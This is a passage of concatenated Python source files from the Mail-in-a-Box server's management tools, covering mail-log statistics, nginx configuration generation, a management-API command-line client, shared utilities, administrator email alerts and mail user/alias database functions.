f"{d[row]!s:<20}" col_left[col] = True else: temp = "{:>%s}" % max(5, len(l) + 1, len(str(d[row])) + 1) col_str = temp.format(str(d[row])) col_widths[col] = max(col_widths[col], len(col_str)) line += col_str if do_accum: data_accum[col] += d[row] try: if None not in [latest, earliest]: # noqa PLR6201 vert_pos = len(line) e = earliest[row] l = latest[row] timespan = relativedelta(l, e) if timespan.months: temp = " │ {:0.1f} months" line += temp.format(timespan.months + timespan.days / 30.0) elif timespan.days: temp = " │ {:0.1f} days" line += temp.format(timespan.days + timespan.hours / 24.0) elif (e.hour, e.minute) == (l.hour, l.minute): temp = " │ {:%H:%M}" line += temp.format(e) else: temp = " │ {:%H:%M} - {:%H:%M}" line += temp.format(e, l) except KeyError: pass lines.append(line.rstrip()) try: if VERBOSE: if sub_data is not None: for l, d in sub_data: if d[row]: lines.extend(('┬', '│ %s' % l, '├─%s─' % (len(l) * '─'), '│')) max_len = 0 for v in list(d[row]): lines.append("│ %s" % v) max_len = max(max_len, len(v)) lines.append("└" + (max_len + 1) * "─") if activity is not None: lines.extend(print_time_table( [label for label, _ in activity], [data[row] for _, data in activity], do_print=False )) except KeyError: pass header = str_temp.format("") for col, (l, _) in enumerate(data): if col_left[col]: header += l.ljust(max(5, len(l) + 1, col_widths[col])) else: header += l.rjust(max(5, len(l) + 1, col_widths[col])) if None not in [latest, earliest]: # noqa PLR6201 header += " │ timespan " lines.insert(0, header.rstrip()) table_width = max(len(l) for l in lines) t_line = table_width * "─" b_line = table_width * "─" if vert_pos: t_line = t_line[:vert_pos + 1] + "┼" + t_line[vert_pos + 2:] b_line = b_line[:vert_pos + 1] + ("┬" if VERBOSE else "┼") + b_line[vert_pos + 2:] lines.insert(1, t_line) lines.append(b_line) # Print totals data_accum = [numstr(a) for a in data_accum] footer = str_temp.format("Totals:" if do_accum else " ") for row, (l, _) in enumerate(data): temp = "{:>%d}" % max(5, len(l) + 1) footer += temp.format(data_accum[row]) try: if None not in [latest, earliest]: # noqa PLR6201 max_l = max(latest) min_e = min(earliest) timespan = relativedelta(max_l, min_e) if timespan.days: temp = " │ {:0.2f} days" footer += temp.format(timespan.days + timespan.hours / 24.0) elif (min_e.hour, min_e.minute) == (max_l.hour, max_l.minute): temp = " │ {:%H:%M}" footer += temp.format(min_e) else: temp = " │ {:%H:%M} - {:%H:%M}" footer += temp.format(min_e, max_l) except KeyError: pass lines.append(footer) print("\n".join(lines)) def print_header(msg): print('\n' + msg) print("═" * len(msg), '\n') if __name__ == "__main__": try: env_vars = utils.load_environment() except FileNotFoundError: env_vars = {} parser = argparse.ArgumentParser( description="Scan the mail log files for interesting data. By default, this script " "shows today's incoming and outgoing mail statistics. This script was (" "re)written for the Mail-in-a-box email server." "https://github.com/mail-in-a-box/mailinabox", add_help=False ) # Switches to determine what to parse and what to ignore parser.add_argument("-r", "--received", help="Scan for received emails.", action="store_true") parser.add_argument("-s", "--sent", help="Scan for sent emails.", action="store_true") parser.add_argument("-l", "--logins", help="Scan for user logins to IMAP/POP3.", action="store_true") parser.add_argument("-g", "--grey", help="Scan for greylisted emails.", action="store_true") parser.add_argument("-b", "--blocked", help="Scan for blocked emails.", action="store_true") parser.add_argument("-t", "--timespan", choices=TIME_DELTAS.keys(), default='today', metavar='<time span>', help="Time span to scan, going back from the end date. Possible values: " "{}. Defaults to 'today'.".format(", ".join(list(TIME_DELTAS.keys())))) # keep the --startdate arg for backward compatibility parser.add_argument("-d", "--enddate", "--startdate", action="store", dest="enddate", type=valid_date, metavar='<end date>', help="Date and time to end scanning the log file. If no date is " "provided, scanning will end at the current date and time. " "Alias --startdate is for compatibility.") parser.add_argument("-u", "--users", action="store", dest="users", metavar='<email1,email2,email...>', help="Comma separated list of (partial) email addresses to filter the " "output with.") parser.add_argument('-h', '--help', action='help', help="Print this message and exit.") parser.add_argument("-v", "--verbose", help="Output extra data where available.", action="store_true") args = parser.parse_args() if args.enddate is not None: END_DATE = args.enddate if args.timespan == 'today': args.timespan = 'day' print(f"Setting end date to {END_DATE}") START_DATE = END_DATE - TIME_DELTAS[args.timespan] VERBOSE = args.verbose if args.received or args.sent or args.logins or args.grey or args.blocked: SCAN_IN = args.received if not SCAN_IN: print("Ignoring received emails") SCAN_OUT = args.sent if not SCAN_OUT: print("Ignoring sent emails") SCAN_DOVECOT_LOGIN = args.logins if not SCAN_DOVECOT_LOGIN: print("Ignoring logins") SCAN_GREY = args.grey if SCAN_GREY: print("Showing greylisted emails") SCAN_BLOCKED = args.blocked if SCAN_BLOCKED: print("Showing blocked emails") if args.users is not None: FILTERS = args.users.strip().split(',') scan_mail_log(env_vars) File: management/web_update.py # Creates an nginx configuration file so we serve HTTP/HTTPS on all # domains for which a mail account has been set up. ######################################################################## import os.path, re, rtyaml from mailconfig import get_mail_domains from dns_update import get_custom_dns_config, get_dns_zones from ssl_certificates import get_ssl_certificates, get_domain_ssl_files, check_certificate from utils import shell, safe_domain_name, sort_domains def get_web_domains(env, include_www_redirects=True, include_auto=True, exclude_dns_elsewhere=True): # What domains should we serve HTTP(S) for? domains = set() # Serve web for all mail domains so that we might at least # provide auto-discover of email settings, and also a static website # if the user wants to make one. domains |= get_mail_domains(env) if include_www_redirects and include_auto: # Add 'www.' subdomains that we want to provide default redirects # to the main domain for. We'll add 'www.' to any DNS zones, i.e. # the topmost of each domain we serve. domains |= {'www.' + zone for zone, zonefile in get_dns_zones(env)} if include_auto: # Add Autoconfiguration domains for domains that there are user accounts at: # 'autoconfig.' for Mozilla Thunderbird auto setup. # 'autodiscover.' for ActiveSync autodiscovery (Z-Push). domains |= {'autoconfig.' + maildomain for maildomain in get_mail_domains(env, users_only=True)} domains |= {'autodiscover.' + maildomain for maildomain in get_mail_domains(env, users_only=True)} # 'mta-sts.' for MTA-STS support for all domains that have email addresses. domains |= {'mta-sts.' + maildomain for maildomain in get_mail_domains(env)} if exclude_dns_elsewhere: # ...Unless the domain has an A/AAAA record that maps it to a different # IP address than this box. Remove those domains from our list. domains -= get_domains_with_a_records(env) # Ensure the PRIMARY_HOSTNAME is in the list so we can serve webmail # as well as Z-Push for Exchange ActiveSync. This can't be removed # by a custom A/AAAA record and is never a 'www.' redirect. domains.add(env['PRIMARY_HOSTNAME']) # Sort the list so the nginx conf gets written in a stable order. return sort_domains(domains, env) def get_domains_with_a_records(env): domains = set() dns = get_custom_dns_config(env) for domain, rtype, value in dns: if rtype == "CNAME" or (rtype in {"A", "AAAA"} and value not in {"local", env['PUBLIC_IP']}): domains.add(domain) return domains def get_web_domains_with_root_overrides(env): # Load custom settings so we can tell what domains have a redirect or proxy set up on '/', # which means static hosting is not happening. root_overrides = { } nginx_conf_custom_fn = os.path.join(env["STORAGE_ROOT"], "www/custom.yaml") if os.path.exists(nginx_conf_custom_fn): with open(nginx_conf_custom_fn, encoding='utf-8') as f: custom_settings = rtyaml.load(f) for domain, settings in custom_settings.items(): for type, value in [('redirect', settings.get('redirects', {}).get('/')), ('proxy', settings.get('proxies', {}).get('/'))]: if value: root_overrides[domain] = (type, value) return root_overrides def do_web_update(env): # Pre-load what SSL certificates we will use for each domain. ssl_certificates = get_ssl_certificates(env) # Helper for reading config files and templates def read_conf(conf_fn): with open(os.path.join(os.path.dirname(__file__), "../conf", conf_fn), encoding='utf-8') as f: return f.read() # Build an nginx configuration file. nginx_conf = read_conf("nginx-top.conf") # Load the templates. template0 = read_conf("nginx.conf") template1 = read_conf("nginx-alldomains.conf") template2 = read_conf("nginx-primaryonly.conf") template3 = "\trewrite ^(.*) https://$REDIRECT_DOMAIN$1 permanent;\n" # Add the PRIMARY_HOST configuration first so it becomes nginx's default server. nginx_conf += make_domain_config(env['PRIMARY_HOSTNAME'], [template0, template1, template2], ssl_certificates, env) # Add configuration all other web domains. has_root_proxy_or_redirect = get_web_domains_with_root_overrides(env) web_domains_not_redirect = get_web_domains(env, include_www_redirects=False) for domain in get_web_domains(env): if domain == env['PRIMARY_HOSTNAME']: # PRIMARY_HOSTNAME is handled above. continue if domain in web_domains_not_redirect: # This is a regular domain. if domain not in has_root_proxy_or_redirect: nginx_conf += make_domain_config(domain, [template0, template1], ssl_certificates, env) else: nginx_conf += make_domain_config(domain, [template0], ssl_certificates, env) else: # Add default 'www.' redirect. nginx_conf += make_domain_config(domain, [template0, template3], ssl_certificates, env) # Did the file change? If not, don't bother writing & restarting nginx. nginx_conf_fn = "/etc/nginx/conf.d/local.conf" if os.path.exists(nginx_conf_fn): with open(nginx_conf_fn, encoding='utf-8') as f: if f.read() == nginx_conf: return "" # Save the file. with open(nginx_conf_fn, "w", encoding='utf-8') as f: f.write(nginx_conf) # Kick nginx. Since this might be called from the web admin # don't do a 'restart'. That would kill the connection before # the API returns its response. A 'reload' should be good # enough and doesn't break any open connections. shell('check_call', ["/usr/sbin/service", "nginx", "reload"]) return "web updated\n" def make_domain_config(domain, templates, ssl_certificates, env): # GET SOME VARIABLES # Where will its root directory be for static files? root = get_web_root(domain, env) # What private key and SSL certificate will we use for this domain? tls_cert = get_domain_ssl_files(domain, ssl_certificates, env) # ADDITIONAL DIRECTIVES. nginx_conf_extra = "" # Because the certificate may change, we should recognize this so we # can trigger an nginx update. def hashfile(filepath): import hashlib sha1 = hashlib.sha1() with open(filepath, 'rb') as f: sha1.update(f.read()) return sha1.hexdigest() nginx_conf_extra += "\t# ssl files sha1: {} / {}\n".format(hashfile(tls_cert["private-key"]), hashfile(tls_cert["certificate"])) # Add in any user customizations in YAML format. hsts = "yes" nginx_conf_custom_fn = os.path.join(env["STORAGE_ROOT"], "www/custom.yaml") if os.path.exists(nginx_conf_custom_fn): with open(nginx_conf_custom_fn, encoding='utf-8') as f: yaml = rtyaml.load(f) if domain in yaml: yaml = yaml[domain] # any proxy or redirect here? for path, url in yaml.get("proxies", {}).items(): # Parse some flags in the fragment of the URL. pass_http_host_header = False proxy_redirect_off = False frame_options_header_sameorigin = False web_sockets = False m = re.search("#(.*)$", url) if m: for flag in m.group(1).split(","): if flag == "pass-http-host": pass_http_host_header = True elif flag == "no-proxy-redirect": proxy_redirect_off = True elif flag == "frame-options-sameorigin": frame_options_header_sameorigin = True elif flag == "web-sockets": web_sockets = True url = re.sub("#(.*)$", "", url) nginx_conf_extra += "\tlocation %s {" % path nginx_conf_extra += "\n\t\tproxy_pass %s;" % url if proxy_redirect_off: nginx_conf_extra += "\n\t\tproxy_redirect off;" if pass_http_host_header: nginx_conf_extra += "\n\t\tproxy_set_header Host $http_host;" if frame_options_header_sameorigin: nginx_conf_extra += "\n\t\tproxy_set_header X-Frame-Options SAMEORIGIN;" if web_sockets: nginx_conf_extra += "\n\t\tproxy_http_version 1.1;" nginx_conf_extra += "\n\t\tproxy_set_header Upgrade $http_upgrade;" nginx_conf_extra += "\n\t\tproxy_set_header Connection 'Upgrade';" nginx_conf_extra += "\n\t\tproxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;" nginx_conf_extra += "\n\t\tproxy_set_header X-Forwarded-Host $http_host;" nginx_conf_extra += "\n\t\tproxy_set_header X-Forwarded-Proto $scheme;" nginx_conf_extra += "\n\t\tproxy_set_header X-Real-IP $remote_addr;" nginx_conf_extra += "\n\t}\n" for path, alias in yaml.get("aliases", {}).items(): nginx_conf_extra += "\tlocation %s {" % path nginx_conf_extra += "\n\t\talias %s;" % alias nginx_conf_extra += "\n\t}\n" for path, url in yaml.get("redirects", {}).items(): nginx_conf_extra += f"\trewrite {path} {url} permanent;\n" # override the HSTS directive type hsts = yaml.get("hsts", hsts) # Add the HSTS header. if hsts == "yes": nginx_conf_extra += '\tadd_header Strict-Transport-Security "max-age=15768000" always;\n' elif hsts == "preload": nginx_conf_extra += '\tadd_header Strict-Transport-Security "max-age=15768000; includeSubDomains; preload" always;\n' # Add in any user customizations in the includes/ folder. nginx_conf_custom_include = os.path.join(env["STORAGE_ROOT"], "www", safe_domain_name(domain) + ".conf") if os.path.exists(nginx_conf_custom_include): nginx_conf_extra += "\tinclude %s;\n" % (nginx_conf_custom_include) # PUT IT ALL TOGETHER # Combine the pieces. Iteratively place each template into the "# ADDITIONAL DIRECTIVES HERE" placeholder # of the previous template. nginx_conf = "# ADDITIONAL DIRECTIVES HERE\n" for t in [*templates, nginx_conf_extra]: nginx_conf = re.sub("[ \t]*# ADDITIONAL DIRECTIVES HERE *\n", t, nginx_conf) # Replace substitution strings in the template & return. nginx_conf = nginx_conf.replace("$STORAGE_ROOT", env['STORAGE_ROOT']) nginx_conf = nginx_conf.replace("$HOSTNAME", domain) nginx_conf = nginx_conf.replace("$ROOT", root) nginx_conf = nginx_conf.replace("$SSL_KEY", tls_cert["private-key"]) nginx_conf = nginx_conf.replace("$SSL_CERTIFICATE", tls_cert["certificate"]) return nginx_conf.replace("$REDIRECT_DOMAIN", re.sub(r"^www\.", "", domain)) # for default www redirects to parent domain def get_web_root(domain, env, test_exists=True): # Try STORAGE_ROOT/web/domain_name if it exists, but fall back to STORAGE_ROOT/web/default. for test_domain in (domain, 'default'): root = os.path.join(env["STORAGE_ROOT"], "www", safe_domain_name(test_domain)) if os.path.exists(root) or not test_exists: break return root def get_web_domains_info(env): www_redirects = set(get_web_domains(env)) - set(get_web_domains(env, include_www_redirects=False)) has_root_proxy_or_redirect = set(get_web_domains_with_root_overrides(env)) ssl_certificates = get_ssl_certificates(env) # for the SSL config panel, get cert status def check_cert(domain): try: tls_cert = get_domain_ssl_files(domain, ssl_certificates, env, allow_missing_cert=True) except OSError: # PRIMARY_HOSTNAME cert is missing tls_cert = None if tls_cert is None: return ("danger", "No certificate installed.") cert_status, cert_status_details = check_certificate(domain, tls_cert["certificate"], tls_cert["private-key"]) if cert_status == "OK": return ("success", "Signed & valid. " + cert_status_details) elif cert_status == "SELF-SIGNED": return ("warning", "Self-signed. Get a signed certificate to stop warnings.") else: return ("danger", "Certificate has a problem: " + cert_status) return [ { "domain": domain, "root": get_web_root(domain, env), "custom_root": get_web_root(domain, env, test_exists=False), "ssl_certificate": check_cert(domain), "static_enabled": domain not in (www_redirects | has_root_proxy_or_redirect), } for domain in get_web_domains(env) ] File: management/cli.py #!/usr/bin/python3 # # This is a command-line script for calling management APIs # on the Mail-in-a-Box control panel backend. The script # reads /var/lib/mailinabox/api.key for the backend's # root API key. This file is readable only by root, so this # tool can only be used as root. import sys, getpass, urllib.request, urllib.error, json, csv import contextlib def mgmt(cmd, data=None, is_json=False): # The base URL for the management daemon. (Listens on IPv4 only.) mgmt_uri = 'http://127.0.0.1:10222' setup_key_auth(mgmt_uri) req = urllib.request.Request(mgmt_uri + cmd, urllib.parse.urlencode(data).encode("utf8") if data else None) try: response = urllib.request.urlopen(req) except urllib.error.HTTPError as e: if e.code == 401: with contextlib.suppress(Exception): print(e.read().decode("utf8")) print("The management daemon refused access. The API key file may be out of sync. Try 'service mailinabox restart'.", file=sys.stderr) elif hasattr(e, 'read'): print(e.read().decode('utf8'), file=sys.stderr) else: print(e, file=sys.stderr) sys.exit(1) resp = response.read().decode('utf8') if is_json: resp = json.loads(resp) return resp def read_password(): while True: first = getpass.getpass('password: ') if len(first) < 8: print("Passwords must be at least eight characters.") continue second = getpass.getpass(' (again): ') if first != second: print("Passwords not the same. Try again.") continue break return first def setup_key_auth(mgmt_uri): with open('/var/lib/mailinabox/api.key', encoding='utf-8') as f: key = f.read().strip() auth_handler = urllib.request.HTTPBasicAuthHandler() auth_handler.add_password( realm='Mail-in-a-Box Management Server', uri=mgmt_uri, user=key, passwd='') opener = urllib.request.build_opener(auth_handler) urllib.request.install_opener(opener) if len(sys.argv) < 2: print("""Usage: {cli} user (lists users) {cli} user add [email protected] [password] {cli} user password [email protected] [password] {cli} user remove [email protected] {cli} user make-admin [email protected] {cli} user remove-admin [email protected] {cli} user admins (lists admins) {cli} user mfa show [email protected] (shows MFA devices for user, if any) {cli} user mfa disable [email protected] [id] (disables MFA for user) {cli} alias (lists aliases) {cli} alias add [email protected] [email protected] {cli} alias add [email protected] '[email protected], [email protected]' {cli} alias remove [email protected] Removing a mail user does not delete their mail folders on disk. It only prevents IMAP/SMTP login. """.format( cli="management/cli.py" )) elif sys.argv[1] == "user" and len(sys.argv) == 2: # Dump a list of users, one per line. Mark admins with an asterisk. users = mgmt("/mail/users?format=json", is_json=True) for domain in users: for user in domain["users"]: if user['status'] == 'inactive': continue print(user['email'], end='') if "admin" in user['privileges']: print("*", end='') print() elif sys.argv[1] == "user" and sys.argv[2] in {"add", "password"}: if len(sys.argv) < 5: email = input('email: ') if len(sys.argv) < 4 else sys.argv[3] pw = read_password() else: email, pw = sys.argv[3:5] if sys.argv[2] == "add": print(mgmt("/mail/users/add", { "email": email, "password": pw })) elif sys.argv[2] == "password": print(mgmt("/mail/users/password", { "email": email, "password": pw })) elif sys.argv[1] == "user" and sys.argv[2] == "remove" and len(sys.argv) == 4: print(mgmt("/mail/users/remove", { "email": sys.argv[3] })) elif sys.argv[1] == "user" and sys.argv[2] in {"make-admin", "remove-admin"} and len(sys.argv) == 4: action = 'add' if sys.argv[2] == 'make-admin' else 'remove' print(mgmt("/mail/users/privileges/" + action, { "email": sys.argv[3], "privilege": "admin" })) elif sys.argv[1] == "user" and sys.argv[2] == "admins": # Dump a list of admin users. users = mgmt("/mail/users?format=json", is_json=True) for domain in users: for user in domain["users"]: if "admin" in user['privileges']: print(user['email']) elif sys.argv[1] == "user" and len(sys.argv) == 5 and sys.argv[2:4] == ["mfa", "show"]: # Show MFA status for a user. status = mgmt("/mfa/status", { "user": sys.argv[4] }, is_json=True) W = csv.writer(sys.stdout) W.writerow(["id", "type", "label"]) for mfa in status["enabled_mfa"]: W.writerow([mfa["id"], mfa["type"], mfa["label"]]) elif sys.argv[1] == "user" and len(sys.argv) in {5, 6} and sys.argv[2:4] == ["mfa", "disable"]: # Disable MFA (all or a particular device) for a user. print(mgmt("/mfa/disable", { "user": sys.argv[4], "mfa-id": sys.argv[5] if len(sys.argv) == 6 else None })) elif sys.argv[1] == "alias" and len(sys.argv) == 2: print(mgmt("/mail/aliases")) elif sys.argv[1] == "alias" and sys.argv[2] == "add" and len(sys.argv) == 5: print(mgmt("/mail/aliases/add", { "address": sys.argv[3], "forwards_to": sys.argv[4] })) elif sys.argv[1] == "alias" and sys.argv[2] == "remove" and len(sys.argv) == 4: print(mgmt("/mail/aliases/remove", { "address": sys.argv[3] })) else: print("Invalid command-line arguments.") sys.exit(1) File: management/utils.py import os.path # DO NOT import non-standard modules. This module is imported by # migrate.py which runs on fresh machines before anything is installed # besides Python. # THE ENVIRONMENT FILE AT /etc/mailinabox.conf def load_environment(): # Load settings from /etc/mailinabox.conf. return load_env_vars_from_file("/etc/mailinabox.conf") def load_env_vars_from_file(fn): # Load settings from a KEY=VALUE file. import collections env = collections.OrderedDict() with open(fn, encoding="utf-8") as f: for line in f: env.setdefault(*line.strip().split("=", 1)) return env def save_environment(env): with open("/etc/mailinabox.conf", "w", encoding="utf-8") as f: for k, v in env.items(): f.write(f"{k}={v}\n") # THE SETTINGS FILE AT STORAGE_ROOT/settings.yaml. def write_settings(config, env): import rtyaml fn = os.path.join(env['STORAGE_ROOT'], 'settings.yaml') with open(fn, "w", encoding="utf-8") as f: f.write(rtyaml.dump(config)) def load_settings(env): import rtyaml fn = os.path.join(env['STORAGE_ROOT'], 'settings.yaml') try: with open(fn, encoding="utf-8") as f: config = rtyaml.load(f) if not isinstance(config, dict): raise ValueError # caught below return config except: return { } # UTILITIES def safe_domain_name(name): # Sanitize a domain name so it is safe to use as a file name on disk. import urllib.parse return urllib.parse.quote(name, safe='') def sort_domains(domain_names, env): # Put domain names in a nice sorted order. # The nice order will group domain names by DNS zone, i.e. the top-most # domain name that we serve that ecompasses a set of subdomains. Map # each of the domain names to the zone that contains them. Walk the domains # from shortest to longest since zones are always shorter than their # subdomains. zones = { } for domain in sorted(domain_names, key=len): for z in zones.values(): if domain.endswith("." + z): # We found a parent domain already in the list. zones[domain] = z break else: # 'break' did not occur: there is no parent domain, so it is its # own zone. zones[domain] = domain # Sort the zones. zone_domains = sorted(zones.values(), key = lambda d : ( # PRIMARY_HOSTNAME or the zone that contains it is always first. not (d == env['PRIMARY_HOSTNAME'] or env['PRIMARY_HOSTNAME'].endswith("." + d)), # Then just dumb lexicographically. d, )) # Now sort the domain names that fall within each zone. return sorted(domain_names, key = lambda d : ( # First by zone. zone_domains.index(zones[d]), # PRIMARY_HOSTNAME is always first within the zone that contains it. d != env['PRIMARY_HOSTNAME'], # Followed by any of its subdomains. not d.endswith("." + env['PRIMARY_HOSTNAME']), # Then in right-to-left lexicographic order of the .-separated parts of the name. list(reversed(d.split("."))), )) def sort_email_addresses(email_addresses, env): email_addresses = set(email_addresses) domains = {email.split("@", 1)[1] for email in email_addresses if "@" in email} ret = [] for domain in sort_domains(domains, env): domain_emails = {email for email in email_addresses if email.endswith("@" + domain)} ret.extend(sorted(domain_emails)) email_addresses -= domain_emails ret.extend(sorted(email_addresses)) # whatever is left return ret def shell(method, cmd_args, env=None, capture_stderr=False, return_bytes=False, trap=False, input=None): # A safe way to execute processes. # Some processes like apt-get require being given a sane PATH. import subprocess if env is None: env = {} env.update({ "PATH": "/sbin:/bin:/usr/sbin:/usr/bin" }) kwargs = { 'env': env, 'stderr': None if not capture_stderr else subprocess.STDOUT, } if method == "check_output" and input is not None: kwargs['input'] = input if not trap: ret = getattr(subprocess, method)(cmd_args, **kwargs) else: try: ret = getattr(subprocess, method)(cmd_args, **kwargs) code = 0 except subprocess.CalledProcessError as e: ret = e.output code = e.returncode if not return_bytes and isinstance(ret, bytes): ret = ret.decode("utf8") if not trap: return ret else: return code, ret def create_syslog_handler(): import logging.handlers handler = logging.handlers.SysLogHandler(address='/dev/log') handler.setLevel(logging.WARNING) return handler def du(path): # Computes the size of all files in the path, like the `du` command. # Based on http://stackoverflow.com/a/17936789. Takes into account # soft and hard links. total_size = 0 seen = set() for dirpath, _dirnames, filenames in os.walk(path): for f in filenames: fp = os.path.join(dirpath, f) try: stat = os.lstat(fp) except OSError: continue if stat.st_ino in seen: continue seen.add(stat.st_ino) total_size += stat.st_size return total_size def wait_for_service(port, public, env, timeout): # Block until a service on a given port (bound privately or publicly) # is taking connections, with a maximum timeout. import socket, time start = time.perf_counter() while True: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(timeout/3) try: s.connect(("127.0.0.1" if not public else env['PUBLIC_IP'], port)) return True except OSError: if time.perf_counter() > start+timeout: return False time.sleep(min(timeout/4, 1)) def get_ssh_port(): port_value = get_ssh_config_value("port") if port_value: return int(port_value) return None def get_ssh_config_value(parameter_name): # Returns ssh configuration value for the provided parameter try: output = shell('check_output', ['sshd', '-T']) except FileNotFoundError: # sshd is not installed. That's ok. return None except subprocess.CalledProcessError: # error while calling shell command return None for line in output.split("\n"): if " " not in line: continue # there's a blank line at the end key, values = line.split(" ", 1) if key == parameter_name: return values # space-delimited if there are multiple values # Did not find the parameter! return None if __name__ == "__main__": from web_update import get_web_domains env = load_environment() domains = get_web_domains(env) for domain in domains: print(domain) File: management/email_administrator.py #!/usr/local/lib/mailinabox/env/bin/python # Reads in STDIN. If the stream is not empty, mail it to the system administrator. import sys import html import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText # In Python 3.6: #from email.message import Message from utils import load_environment # Load system environment info. env = load_environment() # Process command line args. subject = sys.argv[1] # Administrator's email address. admin_addr = "administrator@" + env['PRIMARY_HOSTNAME'] # Read in STDIN. content = sys.stdin.read().strip() # If there's nothing coming in, just exit. if content == "": sys.exit(0) # create MIME message msg = MIMEMultipart('alternative') # In Python 3.6: #msg = Message() msg['From'] = '"{}" <{}>'.format(env['PRIMARY_HOSTNAME'], admin_addr) msg['To'] = admin_addr msg['Subject'] = "[{}] {}".format(env['PRIMARY_HOSTNAME'], subject) content_html = f'<html><body><pre style="overflow-x: scroll; white-space: pre;">{html.escape(content)}</pre></body></html>' msg.attach(MIMEText(content, 'plain')) msg.attach(MIMEText(content_html, 'html')) # In Python 3.6: #msg.set_content(content) #msg.add_alternative(content_html, "html") # send smtpclient = smtplib.SMTP('127.0.0.1', 25) smtpclient.ehlo() smtpclient.sendmail( admin_addr, # MAIL FROM admin_addr, # RCPT TO msg.as_string()) smtpclient.quit() File: management/mailconfig.py #!/usr/local/lib/mailinabox/env/bin/python # NOTE: # This script is run both using the system-wide Python 3 # interpreter (/usr/bin/python3) as well as through the # virtualenv (/usr/local/lib/mailinabox/env). So only # import packages at the top level of this script that # are installed in *both* contexts. We use the system-wide # Python 3 in setup/questions.sh to validate the email # address entered by the user. import os, sqlite3, re import utils from email_validator import validate_email as validate_email_, EmailNotValidError import idna def validate_email(email, mode=None): # Checks that an email address is syntactically valid. Returns True/False. # An email address may contain ASCII characters only because Dovecot's # authentication mechanism gets confused with other character encodings. # # When mode=="user", we're checking that this can be a user account name. # Dovecot has tighter restrictions - letters, numbers, underscore, and # dash only! # # When mode=="alias", we're allowing anything that can be in a Postfix # alias table, i.e. omitting the local part ("@domain.tld") is OK. # Check the syntax of the address. try: validate_email_(email, allow_smtputf8=False, check_deliverability=False, allow_empty_local=(mode=="alias") ) except EmailNotValidError: return False if mode == 'user': # There are a lot of characters permitted in email addresses, but # Dovecot's sqlite auth driver seems to get confused if there are any # unusual characters in the address. Bah. Also note that since # the mailbox path name is based on the email address, the address # shouldn't be absurdly long and must not have a forward slash. # Our database is case sensitive (oops), which affects mail delivery # (Postfix always queries in lowercase?), so also only permit lowercase # letters. if len(email) > 255: return False if re.search(r'[^\@\.a-z0-9_\-]+', email): return False # Everything looks good. return True def sanitize_idn_email_address(email): # The user may enter Unicode in an email address. Convert the domain part # to IDNA before going into our database. Leave the local part alone --- # although validate_email will reject non-ASCII characters. # # The domain name system only exists in ASCII, so it doesn't make sense # to store domain names in Unicode. We want to store what is meaningful # to the underlying protocols. try: localpart, domainpart = email.split("@") domainpart = idna.encode(domainpart).decode('ascii') return localpart + "@" + domainpart except (ValueError, idna.IDNAError): # ValueError: String does not have a single @-sign, so it is not # a valid email address. IDNAError: Domain part is not IDNA-valid. # Validation is not this function's job, so return value unchanged. # If there are non-ASCII characters it will be filtered out by # validate_email. return email def prettify_idn_email_address(email): # This is the opposite of sanitize_idn_email_address. We store domain # names in IDNA in the database, but we want to show Unicode to the user. try: localpart, domainpart = email.split("@") domainpart = idna.decode(domainpart.encode("ascii")) return localpart + "@" + domainpart except (ValueError, UnicodeError, idna.IDNAError): # Failed to decode IDNA, or the email address does not have a # single @-sign. Should never happen. return email def is_dcv_address(email): email = email.lower() return any(email.startswith((localpart + "@", localpart + "+")) for localpart in ("admin", "administrator", "postmaster", "hostmaster", "webmaster", "abuse")) def open_database(env, with_connection=False): conn = sqlite3.connect(env["STORAGE_ROOT"] + "/mail/users.sqlite") if not with_connection: return conn.cursor() else: return conn, conn.cursor() def get_mail_users(env): # Returns a flat, sorted list of all user accounts. c = open_database(env) c.execute('SELECT email FROM users') users = [ row[0] for row in c.fetchall() ] return utils.sort_email_addresses(users, env) def get_mail_users_ex(env, with_archived=False): # Returns a complex data structure of all user accounts, optionally # including archived (status="inactive") accounts. # # [ # { # domain: "domain.tld", # users: [ # { # email: "[email protected]", # privileges: [ "priv1", "priv2", ... ], # status: "active" | "inactive", # }, # ... # ] # }, # ... # ] # Get users and their privileges. users = [] active_accounts = set() c = open_database(env) c.execute('SELECT email, privileges FROM users') for email, privileges in c.fetchall(): active_accounts.add(email) user = { "email": email, "privileges": parse_privs(privileges), "status": "active", } users.append(user) # Add in archived accounts. if with_archived: root = os.path.join(env['STORAGE_ROOT'], 'mail/mailboxes') for domain in os.listdir(root): if os.path.isdir(os.path.join(root, domain)): for user in os.listdir(os.path.join(root, domain)): email = user + "@" + domain mbox = os.path.join(root, domain, user) if email in active_accounts: continue user = { "email": email, "privileges": [], "status": "inactive", "mailbox": mbox, } users.append(user) # Group by domain. domains = { } for user in users: domain = get_domain(user["email"]) if domain not in domains: domains[domain] = { "domain": domain, "users": [] } domains[domain]["users"].append(user) # Sort domains. domains = [domains[domain] for domain in utils.sort_domains(domains.keys(), env)] # Sort users within each domain first by status then lexicographically by email address. for domain in domains: domain["users"].sort(key = lambda user : (user["status"] != "active", user["email"])) return domains def get_admins(env): # Returns a set of users with admin privileges. users = set() for domain in get_mail_users_ex(env): for user in domain["users"]: if "admin" in user["privileges"]: users.add(user["email"]) return users def get_mail_aliases(env): # Returns a sorted list of tuples of (address, forward-tos, permitted-senders, auto). c = open_database(env) c.execute('SELECT source, destination, permitted_senders, 0 as auto FROM aliases UNION SELECT source, destination, permitted_senders, 1 as auto FROM auto_aliases') aliases = { row[0]: row for row in c.fetchall() } # make dict # put in a canonical order: sort by domain, then by email address lexicographically return [ aliases[address] for address in utils.sort_email_addresses(aliases.keys(), env) ] def get_mail_aliases_ex(env): # Returns a complex data structure of all mail aliases, similar # to get_mail_users_ex. # # [ # { # domain: "domain.tld", # alias: [ # { # address: "[email protected]", # IDNA-encoded # address_display: "[email protected]", # full Unicode # forwards_to: ["[email protected]", "[email protected]", ...], # permitted_senders: ["[email protected]", "[email protected]", ...] OR null, # auto: True|False # }, # ... # ] # }, # ... # ] domains = {} for address, forwards_to, permitted_senders, auto in get_mail_aliases(env): # skip auto domain maps since these are not informative in the control panel's aliases list if auto and address.startswith("@"): continue # get alias info domain = get_domain(address) # add to list if domain not in domains: domains[domain] = { "domain": domain, "aliases": [], } domains[domain]["aliases"].append({ "address": address, "address_display": prettify_idn_email_address(address), "forwards_to": [prettify_idn_email_address(r.strip()) for r in forwards_to.split(",")], "permitted_senders": [prettify_idn_email_address(s.strip()) for s in permitted_senders.split(",")] if permitted_senders is not None else None, "auto": bool(auto), }) # Sort domains. domains = [domains[domain] for domain in utils.sort_domains(domains.keys(), env)] # 